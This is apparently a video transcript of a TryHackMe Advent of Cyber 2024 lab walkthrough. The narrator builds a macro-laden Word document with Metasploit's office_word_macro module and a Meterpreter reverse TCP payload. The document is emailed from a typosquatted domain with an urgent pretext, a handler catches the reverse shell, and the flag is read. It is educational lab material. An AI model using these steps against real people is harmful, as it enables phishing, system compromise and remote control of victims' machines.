Hello everyone, welcome back to the day 10 of Advent of Cyber 2024 of TryHackMe. Continuing with our series of Advent of Cyber, we have reached the day 10 and it's about phishing. Now before we actually continue, let's go to the top and then click on Start Attack Box because we need that today. And you can see that our screen has become in half. Okay, now let's continue with the story here. Let me just go through the poem, and I would not be going on reading the description and all because of course you all can do that. I just want to showcase and feature this thing of fishing, so let's just focus on that. But before that, let me read the poem and part of the story, which is what is going to get Advent of Cyber making it fun. The story: Mayor Malware had just one sock mask wish. The sock organizer would fall for his fish. Well, on top of this, he wanted as well, once the email opened, to gain a reverse shell. Mayor Malware attempts to phish one of the sock mask organizer by sending a document embedded with a malicious macro. Once opened, the macro will execute, giving the mayor remote access to the organizer's system. So this is the organizer. Her name is Marta May. Marta May. So Marta Mayweather is surprised that her system was compromised even after following tight security. But Mixed Kitty thinks she traced the attacker and he got in. It's none of the other than the mayor malware who got into the system. This time the mayor used the phishing to get his victim. Mixed Kitty quick incident response prevented significant damage. So, in this task, you will run a security assessment against Marta May where the purpose would be to improve her security and raise her cyber security awareness against future attack. Glitch is still concerned about any future attack on Marta Mayweather and advises Mixkitty to run a phishing exercise on her to verify whether she is vigilant about these attacks. So now we would be putting on the perspective of the mayor or the bad guy who fished Marta May. I might be mispronouncing her name. That's fine. So learning objective is today to understand about phishing attack works, discover how macros in documents can be used and abused, learn to carry out a phishing attack with a macro. Now, what exactly is a phishing attack? Phishing is like, by definition, or if you're new to cybersecurity, you can think of it like the actual phishing which exactly happens, where you put in something which is like a worm or something which the fish would love to eat into the pond, and then you wait for the fish to come and take a bite of it. Now, taking that bite will hook the fish into your fishing rod, and then you do whatever you want to do. The same thing goes with the phishing in cybersecurity, where you put in something like a bait for the victim to open or run or click onto, and then because of that activity, you can trigger out anything that you want. It could be to capture the credentials, it could be to compromise the system, or it could be to do anything that you want as an attacker to perform. So that is like phishing. The exact term what we would be using in English is something is what related to cybersecurity. If you're a professional or have been in the industry, you would know this by a different definition also, but there are different types of phishing in it now. So it's about human phishing, or it can be system phishing, or it can be an ideological or a thought process phishing. So we will today focus on human phishing, but this is a part of social engineering. So the system phishing or infrastructure phishing is nothing but trying to compromise the operating system using the phishing method. But when it comes to human phishing, it's part of social engineering. So I would not go deep into what is social engineering and all, but for just an idea, you can assume social engineering is like hacking the brain OS or the human OS. So if you consider everything to be an operating system, it's like trying to compromise the brain or the human senses or humans thought process is what is like human OS hacking or hacking humans. So what happens in phishing with humans is that I try to work on your 7 fundamental impulses that you get. It can be either through authority, or it could be either through fear, or it could be through your temptation or anything like that. It's basically humans have 7 fundamental temptations or impulses in us. It's deep in psychology, or whenever you study social engineering in depth, you will go through this. Or I will upload someday something related to social engineering on my YouTube channel. And if you're really interested, you can comment down below that you want a social engineering video, and I will create one. So coming back to what phishing is, so we will be using those impulses of humans or the temptation to make them click on the things that we usually they would not click into, but they would click on our link or documents or some files that we told them to click onto. That is phishing. And what is macros? Macros is something like a backend process that runs in my MS Office. So if you're using a Word, there are other behind the backend processes which it keeps running during the execution of that program. It can be MS Word, Excel, PowerPoint, and all those things. So in this today's task, we'll be using macros. Just for your awareness, I guess from the recent update of Windows, macros are permanently disabled to run by default. In fact, a few years ago, you were able to run macros by default. So in the backend, the macros were running without any permissions required or configuration changes. But nowadays, you need to, if you are running macros, you need to change those settings to make sure that you will run the macros. If not, by default, it is not running. So just a precaution or a caution that you need to be knowing. Now, how would a macro look like? What would be the difference for the normal day-to-day user if you're running a macro? Nothing. I can honestly tell you that it's like a backend process. Now you can see the windows running, but you never see the backend process that is running, right? But you see the GUI, you see the interfaces interacting with you and all, but the code is hidden. So something like that. You'll be having a code in the backend which is running in the Word, which which does whatever you want it to do. For that, for in our case today, it's going to be sending a reverse shell into it. So you can even read through here that they have shown how do you create a macro and for what purpose and all those things. So you can read through this if you are really interested to know more about it. But I just want to stick into today's plan and today's objective from this room. So attack plan. What is the attack plan of Maya malware? So let's look into that. In his plan, Maya malware needs to create a document with a malicious macro. Upon opening the document, the macro will execute a payload and connect to the mayor's machine, giving him remote control. Consequently, the mayor needs to ensure that he is listening for incoming connection on his machine before emailing the malicious document to Marta May where, yeah. Marta may where by executing the macro. The mayor gains remote access to Marta's system through a reverse shell, allowing him to execute commands and control her machine remotely. The steps are as follows. Create a document with a malicious macro. Start listening for incoming connections on the attacker's system. Email the document and wait for the target to open it. Then the target opens the document and connects to the attacker's system. Control the target user's system. So it's pretty much simple. It's all about creating a macro or a malicious file and then emailing it to them, and also opening a session where you can listen for the incoming request from the malicious payload which you have sent, and then whatever you want to do with them. So connecting to the machine, we have done that. Let's also click on start machine so that we will get some IP address that we need to be mailing and all those things. So we have clicked on start machine. It will take up its time. Till then, let's go to whatever the description is here. So attacker system, yeah, we have done this. We have powered on the attacker's machine. You can see in this side. So let's press enter and close the terminal that we have been seeing here. And it says on the attacker's box, you need to carry out 2 steps. Create a document with the embedded malicious macro and listen for the incoming connections. And they've also given a description about creating the malicious document. In this case, we'll be using MSF console. So if you're not knowing what is MFS console, it's basically a tool where you can create payloads like this. It has an abundant list of payloads and such things for reversal and all those things. It has documents of it, or not a documents. It's like a tool used for doing all this stuff. So let's follow the instruction here. Let's open the terminal. You can either click here or click on that home screen and you can do it. So let me reduce the font size of my terminal and make this full screen so that we can look at the complete command here. So let's type in the command msf console. If I can spell that right, console, and press enter. It will take some time to open that. This copy of Metasploit framework is more than 2 weeks old. Consider running MSF update to update it. Yeah, I mean, not an issue for us. So it'll take a few seconds to boot up and load all the frameworks in the backend. Now what we'll do is we'll be running the command set payload windows metapreter reverse shell reverse TCP, so which specifies the payload to use. In this case, it connects to the specified host and creates a reverse shell. Okay. Come on, buddy. Can you make it a little fast? Yeah. So if everything goes well, you will look at this window, and it is also waiting for. I'm waiting for the input option, or what do we call that? I forgot the name, but the place where you input stuff, or basically the terminals. Oh God, how can I forget this? Whatever. So yeah, this is the place where you can enter all these commands now. So let me clear up my window if that is possible. Yeah. So we have a fresh terminal here of MSF console. So you can see it here, MSF6, which shows that yes, we can now enter the commands. So let's type in this command, which says set payload and then Windows Meter reverse underscore TCP and press enter. If there is no type of error in typing whatever you typed, you will get this output which says payload has been set to this one. So now what we'll do is we will say we want to use what kind of exploit. Okay, so we'll be saying use exploit multi, let me spell that right, multi file format, then office underscore word underscore macro. So this is going to be creating a macro word file which would be containing the payload of reverse shell. So that's why we use the option set the payload and then use the exploit, this one. So I can see an error here which says user instead of use, then press enter. So it is using configured payload Windows Meterpreter for that. So it does set the payload for the macro of word. So we have configured that. Now let's do some other configurations like setting our L host. So set L host and my IP address. So IP address you can see it here, which is unique for everyone, whoever is accessing. So TryHackMe has made sure that you'll be having a different IP address so that no two users can be in the same IP address. Or else you can even see it here at the top of the screen which says attack box IP and then you can enter that. So lhost, I'll enter my IP 10.10.26.194 and then press enter. So which is going to specify my listening host to be this IP address. Then set L port 888. So you can see it here, which is the port number which I want the victim machine to come and connect back to me. So that is the number. So I'll say set L port and then 888. So that's going to specify the listening port number which would the victim machine come and talk to me, and this port number would be open whenever I initiate the session for receiving the incoming request from the victim. So I'm setting this input fields. Now you can use the option called as show options, so which will give you a description about what and all this particular tool wants and what and all you have entered into it. So it's basically like the description about what you're doing. So here it says L host and it has been specified. Whatever is required is the main things which you'll be supplying. L host is the IP address and L port is the port number which I have specified. And the exploit what we are going to be performing is Microsoft Office Word on Windows. So that has been set. Now all that you have to do is to run the command exploit, or you can even use the command run. So both will do the same thing. exploit is something like a cool term to be using. So it says msf dot com stored at root msf for local msf docm. So it has been stored, and it has given telling that yes, this entire file is ready for us to use. So you can use the command exit and to quit the terminal. So let's do that. And TryHackMe has also given us the screenshot or the how this would look like, these commands being executed. So that we have already done. Now to go and look at that location, let's go there. So where am I? For that, I'll run the command pwd, which will say the present working directory. I'm in the root directory. So using the command ls, I can look at all the folders and files which is present in the desktop or the directory. But since in Linux, know what, all the files are hidden, are having a suffix of dot in them. So any hidden file you'll be having with a dot in front of it. So if I do ls which is going to list all of the contents in a list format, you can see that we have all these files which we initially did not see with a dot in front of them. So it's a hidden file. So let's browse to this msf4 directory. So cd.msf4, and then we are into that file. So here we see a lot of other information which we will not go into, but let's directly go to the locals directory. Let me spell that right. Local. And here we can see our file called as msf.com. So usually you don't just send this same file name to the victim. We can change this file name to something nice, something pretty, which would be like description or something like document. For that, let's say copy msf docm into saying that it's document dot, let me spell that right, document dot docm. So I'm copying the contents of msf dot docm to the documents dot docm. So now you can see that we have two files, both are same contents, both will be having the same thing. Okay, now the created macro enabled document. So we have mentioned earlier how to create a macro with with an MS Word document. You might be interested to see the contents of the file created by MSF console. The screenshot below, you can see the different procedures and functions that make up this macro. Note the attack box doesn't have MSF Office installed. So for this section, you will have to read along. So it's yeah, we don't have MS of Office in this operating system or the attack box which they have given to us. So they have given a screenshot of this. So let's go through this, which says sub auto open. So which means whenever I run the command or whenever I open this file, this function should also start running in the backend. So that's what auto open would do. And then it would say coming down, it would look for the comment section. Hope I can zoom that in. Open image in new tab, and then I can zoom that command. So yeah, it would say if prop.name comments. So you'll have a comment option. I hope they have shown that here. I thought I saw it here, so I'll just come here and see. No, it is not given that. So it's going to open the comment section of the Word document. What is there? And then it says if value found, take that in and then put that original value with base 64 decode. So what happens is attackers are going to somewhere store this payloads in the document. So you need to go to that location where it is stored in the document, which is in the backend or somewhere. And most of the time, it's going to be obfuscated so that the antiviruses or any software which is going to be scanning for any malicious things will not detect it as soon as it sees the file signature of it. So they're going to obfuscate it. Usually, it's not base 64. They use different encoding mechanisms, not encryption. Encoding mechanisms which would encode the payload in some other different thing, which would not let the antivirus softwares to detect these payloads in them. So it's going to go there and then decode it and then supply it to the original value variable. and it's going to check for which operating system it is. So if Mac, then execute the command. If not, if it is Windows, run this command. So you can only have this installed in Windows or Mac. So with that thought and process, it's doing that. Then it's running for executive for Windows and executing for Mac OS. So it's going to go there and then get all the information that is required, and it's going to basically save this payload into some folder, and then going to mention it as .exe and then run that file. That's what is happening. And then this is the function of decoding it with base64 and replacing and creating file and all those things. So yeah, that's a pretty much good analysis, I guess. If I've told something wrong, you can read through the description. Not an offense. So okay, oh, we have it here. So you can see that in the comment section there is payload, which is base64 encoded. So it's going to copy from this and then it's going to send it to the macro, which will save it and then it's going to execute it. So if you copy it and save it to a text file, you can convert the base64 to its original executable format using base64 as shown below. So if you copy the comments, whatever is there, you can decode it using this base64 command. Okay, they also showed that if you copy and paste this command, I guess you get a report from the virus total. Virus total is a online tool which you can use for analyzing what kind of malware it is or file signatures of the malware and then identify what could be the impact and what it does and all those things. It's like a public repository for everyone to come and describe about the malware there. It's a very good thing if you're doing malware analysis. That gives a lot of description about what you need to be doing. Okay, now coming back to listening for incoming connections. So we again will use Metasploit framework, but this time to listen for incoming connections that when target user opens a phishing Word document. So for that, we'll be running MSF console again. So let's do that. MSF console, and it'll take now a little faster than before to open this. Till then, let me take a sip of water. Yeah, so it has given us the MSF console here. And let me clear this so that I'll have all my payloads and the commands, whatever I'm entering, will be in the top of the screen. And this time we'll use what incoming handler called as multi and then handler. So use multi then handler unknown command user. Oh god. So use multi handler. Okay, so it has selected that. Now let's set our payload to be set payload Windows Meta Twitter and then reverse underscore TCP. So unknown data store payload. Okay. So what is the error here? Oh, L is present here. Sorry, I could not. So payload. Yeah, we get the payload. And then we need to specify our host here. So let's set L host and then the IP address of mine, which is 10.26 26.194 and then press enter. That has set the L host. And then we need to specify the port number which we specified earlier. So it's going to be set L port 888. So that's the port number. I specified 4 8s, I guess. Yeah, so 4 times of 8. So that port number is enabled. So we are telling that to this host, listener of this host, and then this port number. So keep that ready for incoming request of anything. So after that, let's say show options, and then here we have done all the things that is required for us. So it says yes for all the three things, and we have specified values to it. And now let's say exploit. So if everything goes well, I should get saying that it's listening. Yeah, so started reverse TCP handler on this. So now it is listening for any of the incoming requests for this IP address and on this port number. So now we will wait for the target to click on our document. So for that, we need to email the target telling that please click on this or please do whatever you need to do and all those things. So they've given us the information which is marta at stockmas.thm, and we need to use this credential to log in into the application what is there for us in the web browser. We'll get into that using this IP address. So this is the location where the IP address is meant for that web application for emailing all those. So it's like a email application. So let's open up Firefox from here. Give it a minute to load. So it has opened up Firefox. Let's paste this IP address in. Let me paste this here and close it and paste this in here. So this will open up the mail application. So let me minimize my window screen so that I get a full screen view of it. Okay, so let's copy this email ID. Now you can see here, there's a bad thing that I did a full screen. Let's zoom in. So you can see here that it says info at stock nas, not mass. So it's something like typoscotting. So what is typoscotting is to have a very similar name between the domain names, that when you have just a glance of the domain name, you would see no difference between the original one and this one. You can have something like Google. So with GOO as two O's in between for the original domain, I can have GOOO, which three times of O in between G and G for Google. So at one glance, with that, what by that having such catchy subject name, you can make sure that they just miss out that sock nas, because M and N looks pretty similar when you're looking at such font style, right? So you will never get to know what it is until unless you really look deep into the domain name. And if you're very well known about the domain name, you might figure it out like that. But if not, it can be something like a subdomain related to a domain which looks similar but is not similar. So um, I mean, there are chances where you can miss out the difference between letters. So you can N and M or different names like that. For YouTube, you can have something else instead of O as U or something like that. So there are chances of typoscotting. So typoscotting is used in social engineering for making sure that the victim just gets what make sure that this is not recognized by the victim. So because I can't own this particular same domain itself, right? It's already owned by the organization, but I can buy some free domains which is present for this similar name, and then I can use that, because if it looks similar, most of the time our eyes just glance them and be like, okay, that's genuine. So that's type of squatting. Now let me copy this domain name, paste it in here. I forgot to put it into the clipboard. So paste it here, and then paste that back again to the web application, and then even also copy this Merry fish mask, the password of the domain or the name. So we have pasted it there. Come on, close and paste it there. Press enter. So we have logged in. Now this is the email application for info at socnas.thm. So yes, let's write an email to marta at stockmas.thm. Let me paste this into my clipboard, then put this here. And subject, let's make sure that it's something which you would obviously click into. So let's say um, updates made to the product. Okay, so that let's keep that subject very simple. uh, let's say, make it a little bit a professional one, which you would obviously get, which be hello, and then Marta, please find the attached document which has the information about. Why is this keyboard not typing in the same speed? Information, okay, about the. Is it due to the issue or that slowness? Because it's not taking the letters as soon as I type it. Okay. Marta, please find the attached document which has the information about the changes made with the products. Uh, Please make it fast as the updates are important to be reviewed. Okay, reviewed. Okay, so and then let's say thank you and administrator. Okay, so this is the one email which I'll be putting out, and then let's attach the document. So no attachment here. Should I? Okay, I can import it from here. Let's go to the desktop, not desktop, the root directory, the home of root directory, and then let's click on Control H, which should open up all the hidden files. Then let's go to the directory which we saw recently of MSF console. It'll be somewhere in the top. Where is it? I'm not able to see it here. Okay. Where are you? Okay, it's in the top here. So going up, I see it. Yeah, it's here. It's here. So MSF4, and then local, and then document.docm. So let's click on that. Open. So this document.docm is uploaded to the mailing application. Now let's send this. Okay, so now let's minimize this. Let me bring this here and minimize this and wait for the connection to come. Okay, so they have given us to do what next? Let's wait for the request to come. So with cross fingers, this has come. It says staging, sending stage, and we have got the shell back from the attack from the victim's machine, which is amazing. So Metapreter session opened for this and this IP address, which is nice, which means the victim has opened our document and we have got the reverse shell. So I can say who am I, which would be my pretty much first command to run. So who am I? It should say unknown command. Okay, we are running a Metapreter shell, so it does not have such commands. Okay, what shall we do now? So it says what is the flag inside the flag.txt located in the administrator's desktop, and they have also given us the location. So let's go that. So cd c, then users administrator, and then desktop. Okay, I'm into that directory. So use the command ls to list out the contents, and we see flag.txt. So cat flag.txt, and we got the flag for today's challenge. So let's copy that, and then open up the clipboard, copy this from here, and then paste it and submit it. That's nice. Now, if you enjoyed this task, feel free to check out the phishing module. Okay, sure. So we have clicked on the correct answer and we have completed the day 10 of Advent of Cyber about phishing. So hope you enjoyed this video and learned something new from this phishing. And if you're new to this channel, please hit on that subscribe button, which will help me a lot, which will motivate me to come and produce contents like this every day for you. And if you did like the video, hit on that like button. And if you want to share to your friends using that share button and all those things. So if you want to say or suggest something for me, you can comment down below. I'm always open for any kind of suggestions and improvements that I can do to produce a better content for you all. So hope you did enjoy the video, and we'll be tuning back tomorrow for the day 11 of Advent of Cyber 2024 of TryHackMe. So that is it for today's video. Bye bye. With